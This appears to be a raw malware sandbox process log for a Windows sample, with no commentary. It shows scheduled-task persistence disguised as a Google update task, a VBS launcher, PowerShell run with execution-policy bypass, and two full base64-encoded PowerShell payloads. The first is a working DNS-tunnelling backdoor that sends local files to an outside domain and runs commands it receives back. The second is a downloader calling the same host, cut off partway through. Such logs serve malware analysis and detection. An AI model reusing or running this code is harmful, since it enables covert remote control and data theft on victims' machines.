C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | f77ee804de304f7c3ea6b87824684b33.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3780 | "C:\Windows\System32\schtasks.exe" /create /F /sc minute /mo 3 /tn "GoogleUpdateTasksMachineUI" /tr C:\Users\Public\Libraries\RecordedTV\backup1.vbs | C:\Windows\System32\schtasks.exe | — | f77ee804de304f7c3ea6b87824684b33.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3340 | C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\RecordedTV\backup1.vbs" | C:\Windows\System32\WScript.exe | — | taskeng.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
1920 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\Libraries\RecordedTV\DnE1.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4012 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\Libraries\RecordedTV\DnS1.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3816 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "&{iex 'powershell -encodedcommand " JABnAGwAbwBiAGEAbAA6AG0AeQBoAG8AcwB0ACAAPQAgACcALgB1AHAAZABhAHQAZQByAC4AbABpACcAOwANAAoAJABnAGwAbwBiAGEAbAA6AGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAnACcAOwANAAoAJABnAGwAbwBiAGEAbAA6AG0AeQBmAGwAYQBnACAAPQAgADAAOwANAAoAJABnAGwAbwBiAGEAbAA6AG0AeQBpAGQAIAA9ACAAJwAjACMAIwAnADsADQAKACQAZwBsAG8AYgBhAGwAOgBtAHkAaABvAG0AZQAgAD0AIAAiACQAZQBuAHYAOgBQAHUAYgBsAGkAYwBcAEwAaQBiAHIAYQByAGkAZQBzAFwAUgBlAGMAbwByAGQAZQBkAFQAVgBcACIAOwANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABjAG8AbgB2AGUAcgB0AFQAbwAtAEIAYQBzAGUAMwA2ACAAKAAkAGQAZQBjAE4AdQBtAD0AIgAiACkADQAKAHsADQAKACAAIAAgACAAJABkAGUAYwBOAHUAbQAgACUAPQAgADQANgA2ADUANgA7AA0ACgAgACAAIAAgACQAYQBsAHAAaABhAGIAZQB0ACAAPQAgACIAMAAxADIAMwA0ADUANgA3ADgAOQBBAEIAQwBEAEUARgBHAEgASQBKAEsATABNAE4ATwBQAFEAUgBTAFQAVQBWAFcAWABZAFoAIgA7AA0ACgAgACAAIAAgAGQAbwANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAbQBhAGkAbgBkAGUAcgAgAD0AIAAoACQAZABlAGMATgB1AG0AIAAlACAAMwA2ACkAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYwBoAGEAcgAgAD0AIAAkAGEAbABwAGgAYQBiAGUAdAAuAHMAdQBiAHMAdAByAGkAbgBnACgAJAByAGUAbQBhAGkAbgBkAGUAcgAsADEAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAGEAcwBlADMANgBOAHUAbQAgAD0AIAAiACQAYwBoAGEAcgAkAGIAYQBzAGUAMwA2AE4AdQBtACIAOwANAAoAIAAgACAAIAAgACAAIAAgACQAZABlAGMATgB1AG0AIAA9ACAAKAAkAGQAZQBjAE4AdQBtACAALQAgACQAcgBlAG0AYQBpAG4AZABlAHIAKQAgAC8AIAAzADYAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAHcAaABpAGwAZQAgACgAJABkAGUAYwBOAHUAbQAgAC0AZwB0ACAAMAApADsADQAKACAAIAAgACAAJABiAGEAcwBlADMANgBOAHUAbQAuAFAAYQBkAEwAZQBmAHQAKAAzACwAJwAwACcAKQA7AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABHAGUAdABTAHUAYgAoACQAbQB5AGYAbABhAGcAMgAsACAAJABjAG0AZABpAGQAPQAnADAAMAAnACwAIAAkAHAAYQByAHQAaQBkAD0AJwAwADAAMAAnACkADQAKAHsADQAKACAAIAAgACAAaQBmACgAJABtAHkAZgBsAGEAZwAyACAALQBlAHEAIAAwACkADQAKACAAIAAgACAAewANAAoACQAJACgAJwB6AHoAMAAwADAAMAAwADAAJwArACgAYwBvAG4AdgBlAHIAdABUAG8ALQBCAGEAcwBlADMANgAoAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAE0AYQB4AGkAbQB1AG0AIAA0ADYANgA1ADUAKQApACkAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAGUAbABzAGUAaQBmACgAJABtAHkAZgBsAGEAZwAyACAALQBlAHEAIAAxACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACgAJwB6AHoAJwArACQAZwBsAG8AYgBhAGwAOgBtAHkAaQBkACsAJwAwADAAMAAwADAAJwArACgAYwBvAG4AdgBlAHIAdABUAG8ALQBCAGEAcwBlADMANgAoAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAE0AYQB4AGkAbQB1AG0AIAA0ADYANgA1ADUAKQApACkAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAGUAbABzAGUAaQBmACgAJABtAHkAZgBsAGEAZwAyACAALQBlAHEAIAAyACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACgAJwB6AHoAJwArACQAZwBsAG8AYgBhAGwAOgBtAHkAaQBkACsAJABjAG0AZABpAGQAKwAkAHAAYQByAHQAaQBkACsAKABjAG8AbgB2AGUAcgB0AFQAbwAtAEIAYQBzAGUAMwA2ACgARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0ATQBhAHgAaQBtAHUAbQAgADQANgA2ADUANQApACkAKQA7AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAGYAdQBuAGMAdABpAG8AbgAgAFMAdAByADIASABlAHgAKAAkAG0AeQBzAHQAcgApAA0ACgB7AA0ACgAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBCAGkAdABDAG8AbgB2AGUAcgB0AGUAcgBdADoAOgBUAG8AUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBEAGUAZgBhAHUAbAB0AC4ARwBlAHQAQgB5AHQAZQBzACgAJABtAHkAcwB0AHIAKQApAC4AUgBlAHAAbABhAGMAZQAoACIALQAiACwAIAAiACIAKQA7AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABBAGwAaQB2AGUADQAKAHsADQAKAAkAaQBmACgAJABnAGwAbwBiAGEAbAA6AG0AeQBpAGQAIAAtAGUAcQAgACcAIwAnACsAJwAjACMAJwApAA0ACgAJAHsADQAKAAkACQByAGUAdAB1AHIAbgAgADAAOwANAAoACQB9AA0ACgAgACAAIAAgAFMAZQBuAGQAUgBlAGMAZQBpAHYAZQBEAE4AUwAgACgAKABHAGUAdABTAHUAYgAgADEAKQArACcAMwAwACcAKQA7AA0ACgAgACAAIAAgACQAcwB1AGIAIAA9ACAAKAAoAEcAZQB0AFMAdQBiACAAMQApACsAJwAyADMAMgBBACcAKQAgACsAIAAoAFMAdAByADIASABlAHgAIAAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACkAOwANAAoAIAAgACAAIAAkAGkAIAA9ACAAMQA7AA0ACgAgACAAIAAgACQAcgBlAHQAIAA9ACAAMAA7AA0ACgAgACAAIAAgAHcAaABpAGwAZQAoACQAZwBsAG8AYgBhAGwAOgBtAHkAZgBsAGEAZwAgAC0AZQBxACAAMQApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAHIAZQB0ACAAPQAgADEAOwANAAoAIAAgACAAIAAgACAAIAAgACQAcwB1AGIAMgAgAD0AIAAkAHMAdQBiACAAKwAgACgAUwB0AHIAMgBIAGUAeAAgACQAaQApADsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkAFIAZQBjAGUAaQB2AGUARABOAFMAIAAkAHMAdQBiADIAOwANAAoAIAAgACAAIAAgACAAIAAgACQAaQArACsAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHQAIAAtAGUAcQAgADEAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAARgBpAHgAQgBhAHQARgBpAGwAZQAgACgAJABnAGwAbwBiAGEAbAA6AG0AeQBoAG8AbQBlACsAJwB0AHAAXAAnACsAJABnAGwAbwBiAGEAbAA6AGYAaQBsAGUAbgBhAG0AZQArACIALgBiAGEAdAAiACkAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgACQAcgBlAHQAOwANAAoAfQANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAFMAZQBuAGQAUgBlAGMAZQBpAHYAZQBEAE4AUwAgACgAJABkACkADQAKAHsADQAKAAkAJABjAG4AdAAgAD0AIAAwADsADQAKAAkAdwBoAGkAbABlACAAKAAkAGMAbgB0ACAALQBsAHQAIAAyADAAKQANAAoACQB7AA0ACgAJAAkAdAByAHkADQAKAAkACQB7AA0ACgAJAAkACQAkAG0AeQBkAGEAdABhACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ARABOAFMAXQA6ADoARwBlAHQASABvAHMAdABCAHkATgBhAG0AZQAoACQAZAArACQAZwBsAG8AYgBhAGwAOgBtAHkAaABvAHMAdAApAC4AQQBkAGQAcgBlAHMAcwBMAGkAcwB0AFsAMABdACkAOwANAAoACQAJAAkAJABtAHkAZABhAHQAYQAgAD0AIAAoACQAbQB5AGQAYQB0AGEAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBJAFAAQQBkAGQAcgBlAHMAcwBUAG8AUwB0AHIAaQBuAGcAfQApADsADQAKAAkACQAJACQAYwBuAHQAIAA9ACAAMgA1ADsADQAKAAkACQB9AA0ACgAJAAkAYwBhAHQAYwBoAA0ACgAJAAkAewANAAoACQAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBtACAANQAwADAAOwANAAoACQAJAAkAJABjAG4AdAArACsAOwANAAoACQAJAH0ADQAKAAkAfQANAAoAIAAgACAAIABpAGYAKAAtAG4AbwB0ACgAJABjAG4AdAAgAC0AZQBxACAAMgA1ACkAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAKAAnACMAJwArACcAIwAjACcAKQA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQBpAGYAKAAkAGcAbABvAGIAYQBsADoAbQB5AGYAbABhAGcAIAAtAGUAcQAgADAAIAAtAGEAbgBkACAAJABtAHkAZABhAHQAYQAuAFMAdABhAHIAdABzAFcAaQB0AGgAKAAnADMAMwAuADMAMwAuACcAKQApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAHQAbQBwACAAPQAgACQAbQB5AGQAYQB0AGEALgBTAHUAYgBTAHQAcgBpAG4AZwAoADYAKQAuAFMAcABsAGkAdAAoACcALgAnACkAOwANAAoAIAAgACAAIAAgACAAIAAgACQAZwBsAG8AYgBhAGwAOgBmAGkAbABlAG4AYQBtAGUAIAA9ACAAKABbAGMAaABhAHIAXQAgAFsAaQBuAHQAXQAgACQAdABtAHAAWwAwAF0AKQAgACsAIAAoAFsAYwBoAGEAcgBdACAAWwBpAG4AdABdACAAJAB0AG0AcABbADEAXQApADsADQAKACAAIAAgACAAIAAgACAAIAAkAGcAbABvAGIAYQBsADoAbQB5AGYAbABhAGcAIAA9ACAAMQA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQBpAGYAIAAoACQAbQB5AGQAYQB0AGEALgBFAHEAdQBhAGwAcwAoACcAMwA1AC4AMwA1AC4AMwA1AC4AMwA1ACcAKQApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGcAbABvAGIAYQBsADoAbQB5AGYAbABhAGcAIAA9ACAAMAA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQBpAGYAIAAoACQAZwBsAG8AYgBhAGwAOgBtAHkAZgBsAGEAZwAgAC0AZQBxACAAMQApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAHQAbQBwACAAPQAgACQAbQB5AGQAYQB0AGEALgBTAHAAbABpAHQAKAAnAC4AJwApADsADQAKACAAIAAgACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBBAHAAcABlAG4AZABBAGwAbABUAGUAeAB0ACgAJABnAGwAbwBiAGEAbAA6AG0AeQBoAG8AbQBlACsAJwB0AHAAXAAnACsAJABnAGwAbwBiAGEAbAA6AGYAaQBsAGUAbgBhAG0AZQArACIALgBiAGEAdAAiACwAIAAoACgAWwBjAGgAYQByAF0AIABbAGkAbgB0AF0AIAAkAHQAbQBwAFsAMABdACkAIAArACAAKABbAGMAaABhAHIAXQAgAFsAaQBuAHQAXQAgACQAdABtAHAAWwAxAF0AKQAgACsAIAAoAFsAYwBoAGEAcgBdACAAWwBpAG4AdABdACAAJAB0AG0AcABbADIAXQApACAAKwAgACgAWwBjAGgAYQByAF0AIABbAGkAbgB0AF0AIAAkAHQAbQBwAFsAMwBdACkAKQApADsADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABlAGwAcwBlAGkAZgAoACQAZwBsAG8AYgBhAGwAOgBtAHkAaQBkACAALQBlAHEAIAAnACMAJwArACcAIwAjACcAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAKABbAGMAaABhAHIAXQAgAFsAaQBuAHQAXQAgACQAbQB5AGQAYQB0AGEALgBTAHAAbABpAHQAKAAnAC4AJwApAFsAMABdACkAOwANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABGAGkAeABCAGEAdABGAGkAbABlACAAKAAkAGIAYQB0AHAAYQB0AGgAKQANAAoAewANAAoAIAAgACAAIAAoAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAYgBhAHQAcABhAHQAaAApAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAxADAAKQAgAHwAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGIAYQB0AHAAYQB0AGgAOwANAAoAfQANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZABGAGkAbABlACgAJABtAHkARgBpAGwAZQBQAGEAdABoACkADQAKAHsADQAKACAAIAAgACAAJABtAHkARgBpAGwAZQBOAGEAbQBlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AEYAaQBsAGUATgBhAG0AZQBXAGkAdABoAG8AdQB0AEUAeAB0AGUAbgBzAGkAbwBuACgAJABtAHkARgBpAGwAZQBQAGEAdABoACkAOwANAAoAIAAgACAAIAAkAG0AeQBzAHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBSAGUAYQBkAEEAbABsAFQAZQB4AHQAKAAkAG0AeQBGAGkAbABlAFAAYQB0AGgAKQA7AA0ACgAgACAAIAAgACQAaQA9ADAAOwANAAoAIAAgACAAIAAkAG0AeQB0AGUAbQBwACAAPQAgACcAJwA7AA0ACgAgACAAIAAgACQAagA9ADAAOwANAAoAIAAgACAAIAB3AGgAaQBsAGUAKAAkAGkAIAAtAGwAZQAgACQAbQB5AHMAdAByAC4ATABlAG4AZwB0AGgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABtAHkAdABlAG0AcAAgACsAPQAgACQAbQB5AHMAdAByAFsAJABpAF0AOwANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAoACgAKAAkAGkAJQAyADQAKQAgAC0AZQBxACAAMgAzACkAIAAtAG8AcgAgACgAJABpACAALQBlAHEAIAAkAG0AeQBzAHQAcgAuAEwAZQBuAGcAdABoACkAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbQB5AGgAZQB4ACAAPQAgAFMAdAByADIASABlAHgAIAAkAG0AeQB0AGUAbQBwADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAUgBlAGMAZQBpAHYAZQBEAE4AUwAgACgAKABHAGUAdABTAHUAYgAgADIAIAAkAG0AeQBGAGkAbABlAE4AYQBtAGUAIAAoAGMAbwBuAHYAZQByAHQAVABvAC0AQgBhAHMAZQAzADYAIAAkAGoAKQApACAAKwAgACQAbQB5AGgAZQB4ACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABqACsAKwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAG0AeQB0AGUAbQBwACAAPQAgACcAJwA7AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACQAaQArACsAOwANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABHAGUAdABJAEQADQAKAHsADQAKAAkAJAB2AGEAbABpAGQAYwBoAGEAcgBzACAAPQAgACIAMAAxADIAMwA0ADUANgA3ADgAOQBBAEIAQwBEAEUARgBHAEgASQBKAEsATABNAE4ATwBQAFEAUgBTAFQAVQBWAFcAWABZAFoAYQBiAGMAZABlAGYAZwBoAGkAagBrAGwAbQBuAG8AcABxAHIAcwB0AHUAdgB3AHgAeQB6ACIAOwANAAoAIAAgACAAIAAkAHQAaQBkACAAPQAgAFMAZQBuAGQAUgBlAGMAZQBpAHYAZQBEAE4AUwAgACgAKABHAGUAdABTAHUAYgAgADAAKQArACcAMwAwACcAKQA7AA0ACgAJAGkAZgAgACgAJAB2AGEAbABpAGQAYwBoAGEAcgBzAC4AQwBvAG4AdABhAGkAbgBzACgAJAB0AGkAZAApACkAewAkAGcAbABvAGIAYQBsADoAbQB5AGkAZAA9ACQAdABpAGQAOwB9AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABDAGgAYQBuAGcAZQBUAGgAaQBzAEYAaQBsAGUAIAAoACQAYgBvAHQAaQBkACkADQAKAHsADQAKAAkAaQBmACgALQBuAG8AdAAoACQAZwBsAG8AYgBhAGwAOgBtAHkAaQBkACAALQBlAHEAIAAoACcAIwAnACsAJwAjACMAJwApACkAKQANAAoAIAAgACAAIAB7AA0ACgAJAAkAJABmAGMAPQAoAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAZQBuAHYAOgBQAHUAYgBsAGkAYwBcAEwAaQBiAHIAYQByAGkAZQBzAFwAUgBlAGMAbwByAGQAZQBkAFQAVgBcAEQAbgBTADEALgBwAHMAMQAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQQBzAGMAaQBpACkAOwANAAoACQAJACQAZgBjAD0AJABmAGMALgBTAHUAYgBTAHQAcgBpAG4AZwAoADQANwApAC4AVAByAGkAbQBFAG4AZAAoACcAIgAnACcAfQAiACcAKQA7AA0ACgAJAAkAJABmAGMAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAGMAKQApADsADQAKAAkACQAkAGYAYwA9ACQAZgBjACAALQByAGUAcABsAGEAYwBlACAAKAAnACMAJwArACcAIwAjACcAKQAsACQAYgBvAHQAaQBkADsADQAKAAkACQAkAGYAYwA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAGYAYwApACkAOwANAAoACQAJACQAZgBjAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAIgAmAHsAaQBlAHgAIAAnACcAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgAnACsAJABmAGMAKwAnACIAJwAnAH0AIgAnADsADQAKAAkACQBTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGUAbgB2ADoAUAB1AGIAbABpAGMAXABMAGkAYgByAGEAcgBpAGUAcwBcAFIAZQBjAG8AcgBkAGUAZABUAFYAXABEAG4AUwAxAC4AcABzADEAIAAkAGYAYwAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQQBzAGMAaQBpADsADQAKAAkAfQANAAoAfQANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAGkAdAANAAoAewANAAoAIAAgACAAIABpAGYAKAAkAGcAbABvAGIAYQBsADoAbQB5AGkAZAAgAC0AZQBxACAAKAAnACMAJwArACcAIwAjACcAKQApAA0ACgAgACAAIAAgAHsADQAKAAkACQBtAGQAIAAtAEYAbwByAGMAZQAgACgAJABnAGwAbwBiAGEAbAA6AG0AeQBoAG8AbQBlACsAJwB0AHAAXAAnACkAOwANAAoACQAJAEcAZQB0AEkARAA7AA0ACgAJAAkAQwBoAGEAbgBnAGUAVABoAGkAcwBGAGkAbABlACAAJABnAGwAbwBiAGEAbAA6AG0AeQBpAGQAOwANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABtAGEAaQBuAA0ACgB7AA0ACgAgACAAIAAgAEkAbgBpAHQAOwANAAoAIAAgACAAIABpAGYAKABBAGwAaQB2AGUAIAAtAGUAcQAgADEAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAGIAYQB0ACAAPgAgACcAKwAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAHQAeAB0ACcAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAUwBlAG4AZABGAGkAbABlACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAHQAeAB0ACcAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAGIAYQB0ACcAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAHQAeAB0ACcAKQA7AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAG0AYQBpAG4AOwANAAoA'} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3700 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "&{iex 'powershell -encodedcommand " JABNAFkASABPAE0ARQAgAD0AIAAkAEUAbgB2ADoAUAB1AGIAbABpAGMAKwAiAFwATABpAGIAcgBhAHIAaQBlAHMAXABSAGUAYwBvAHIAZABlAGQAVABWAFwAIgA7AA0ACgAkAFMARQBSAFYARQBSACAAPQAgACIAaAB0AHQAcAA6AC8ALwB1AHAAZABhAHQAZQByAC4AbABpAC8AaQBuAGQAZQB4AC4AYQBzAHAAeAA/AGkAZAA9ADEAMAA2ADcANgA2ADcANgA3ADYAXAAiADsADQAKACQAVQBQACAAPQAgACIAdQBwAFwAIgA7AA0ACgAkAEQATgAgAD0AIAAiAGQAbgBcACIAOwANAAoAJABUAFAAIAA9ACAAIgB0AHAAXAAiADsADQAKACQAVQBQAEwASwAgAD0AIAAiAHUAcABsAG8AYwBrACIAOwANAAoAJABEAE4ATABLACAAPQAgACIAZAB3AG4AbABvAGMAawAiADsADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAaQBuAGsALAAgACQAcABhAHQAaAApAA0ACgB7AA0ACgAJACQAdwBjACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwANAAoACQAkAHcAYwAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgACQAdAByAHUAZQA7AA0ACgAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBBAGMAYwBlAHAAdAAnACwAJwAqAC8AKgAnACkAOwANAAoACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAGkAYwByAG8AcwBvAGYAdAAgAEIASQBUAFMALwA3AC4ANwAnACkAOwANAAoACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAQQBjAGMAZQBwAHQALQBMAGEAbgBnAHUAYQBnAGUAJwAsACcAZQBuAC0AVQBTACwAZQBuADsAcQA9ADAALgA1ACcAKQA7AA0ACgAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBBAGMAYwBlAHAAdAAtAEUAbgBjAG8AZABpAG4AZwAnACwAJwBnAHoAaQBwACwAIABkAGUAZgBsAGEAdABlACcAKQA7AA0ACgAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBSAGUAZgBlAHIAZQByACcALAAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGcAbwBvAGcAbABlAC4AYwBvAG0AJwApADsADQAKAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAFAAcgBhAGcAbQBhACcALAAnAG4AbwAtAGMAYQBjAGgAZQAnACkAOwANAAoACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAQwBhAGMAaABlAC0AQwBvAG4AdAByAG8AbAAnACwAJwBuAG8ALQBjAGEAYwBoAGUAJwApADsADQAKAAkAJAByACAAPQAgAEcAZQB0AC0AUgBhAG4AZABvAG0AOwANAAoACQAkAGYAaQBsAGUAIAA9ACAAKAAkAHAAYQB0AGgALgBUAHIAaQBtAEUAbgBkACgAJwBcACcAKQApACsAJwBcACcAKwAkAHIAOwANAAoACQB0AHIAeQANAAoACQB7AA0ACgAJAAkAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABpAG4AawAsACQAZgBpAGwAZQApADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgAIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgAJAHsADQAKAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAUgBlAGYAZQByAGUAcgAnACwAJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBnAG8AbwBnAGwAZQAuAGMAbwBtACcAKQA7AA0ACgAJAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAEEAYwBjAGUAcAB0ACcALAAnACoALwAqACcAKQA7AA0ACgAJAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAFsAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcAXQAgAD0AIAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAzADsAIABXAGkAbgA2ADQAOwAgAHgANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAu